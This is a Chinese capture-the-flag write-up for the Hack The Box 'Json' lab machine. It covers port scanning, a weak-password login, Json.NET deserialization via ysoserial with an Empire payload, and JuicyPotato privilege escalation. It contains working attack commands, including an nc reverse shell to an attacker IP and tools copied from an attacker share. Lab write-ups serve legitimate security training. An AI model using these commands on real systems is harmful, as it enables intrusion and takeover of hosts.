前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Hack the box-Json

Hack the box-Json

作者头像
Khan安全团队
发布2020-03-09 19:09:43
7390
发布2020-03-09 19:09:43
举报
文章被收录于专栏:Khan安全团队Khan安全团队

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Json”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。

摘要

  • Json.net 反序列 getshell
  • JuicePotato 提权

信息收集

nmap 扫出了 22 , 80 端口

代码语言:txt
复制
nmap -sC -sV -p- -T4 10.10.10.158Host is up (0.052s latency).Not shown: 65521 closed portsPORT      STATE SERVICE      VERSION21/tcp    open  ftp          FileZilla ftpd| ftp-syst:|_  SYST: UNIX emulated by FileZilla80/tcp    open  http         Microsoft IIS httpd 8.5| http-methods:|_  Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: Json HTB135/tcp   open  msrpc        Microsoft Windows RPC139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49154/tcp open  msrpc        Microsoft Windows RPC49156/tcp open  msrpc        Microsoft Windows RPCService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
代码语言:txt
复制
    主页登录盲猜弱口令
代码语言:txt
复制
admin:admin

进去管理系统没什么功能

代码语言:txt
复制
   登录框抓包发现猫腻

改包为GET后发现bearer参数

代码语言:txt
复制
   bearer参数是json类型
代码语言:txt
复制
   把 json 参数打乱
代码语言:txt
复制
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3",hello world}

Json.net反序列 getshell

发现json.net反序列

代码语言:txt
复制
   利用 ysoserial.exe 进行参数注入getshell
代码语言:txt
复制
   ysoserial.exe 配合 empire的powershell payload 获取shell
代码语言:txt
复制
empire下操作:./empireuselistener httpset Host http://10.10.xx.xx:4444set Port 4444executebacklauncher powershell>>获得$$Empire payload$$
windows下操作:ysoserial.exe -g ObjectDataProvider -f json.net -c "$$Empire Payload$$" -o base64
代码语言:txt
复制
    获取user.txt

Juice potato 提权

代码语言:txt
复制
    检查windows版本
代码语言:txt
复制
(empire:XXXXXXX)shell systeminfo | findstr WindowsOS Name:                   Microsoft Windows Server 2012 R2 Datacenter
代码语言:txt
复制
    用户有 SeImpersonatePrivilege 权限
代码语言:txt
复制
(empire:XXXXXXX)shell whoami /privPRIVILEGES INFORMATION----------------------
Privilege Name                Description                               State============================= ========================================= ========SeAssignPrimaryTokenPrivilege Replace a process level token             DisabledSeIncreaseQuotaPrivilege      Adjust memory quotas for a process        DisabledSeAuditPrivilege              Generate security audits                  DisabledSeChangeNotifyPrivilege       Bypass traverse checking                  EnabledSeImpersonatePrivilege        Impersonate a client after authentication EnabledSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
代码语言:txt
复制
    windows server 2019之前可以使用 juicypotato 提权工具
代码语言:txt
复制
    依靠 SeImpersonatePrivilege 权限,我们应该可以提到 system 权限
代码语言:txt
复制
nc -lvp 4444
(empire:XXXXXXX)cd \windows\temp(empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\JuicyPotato.exe .(empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\nc.exe .(empire:XXXXXXX)shell echo c:\windows\temp\nc.exe 10.10.xx.xx 4444 -e cmd.exe > start.bat(empire:XXXXXXX)shell JuicyPotato.exe -l 1337 -p C:\\windows\temp\start.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
代码语言:txt
复制
    获取root.txt,提权过程没时间复现,思路是对的。           ****
本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-02-17,如有侵权请联系?cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 摘要
  • 信息收集
  • Json.net反序列 getshell
  • Juice potato 提权
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com